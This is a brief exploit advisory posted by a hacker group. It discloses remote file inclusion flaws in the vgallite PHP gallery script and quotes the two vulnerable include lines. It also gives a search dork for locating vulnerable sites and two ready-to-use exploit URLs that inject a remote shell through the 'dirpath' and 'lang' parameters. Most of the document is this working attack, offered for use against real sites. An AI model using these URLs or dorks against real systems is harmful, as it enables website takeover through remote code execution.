ALL vgallite Remote File Include

Discovred By : Hasadya Raed

Contact : [email protected] , [email protected] , [email protected]

Greetz : Jonathan , Muts

Script: ALL vgallite

Dork: "vgallite"

B.File:
_functions.php
index.php

Vuln code: if(ereg($key,$filename)) include_once("$dirpath/$filename");
Vuln code: include_once("lang/".((isset($language))?$language:"english").".php");

Exploit:
Http://www.Victim.com/vgallite/_functions.php?dirpath=[Shell-Attack]
Http://www.Victim.com/vgallite/index.php?lang=[Shell-Attack]

<----!Team Hackers Israel----!>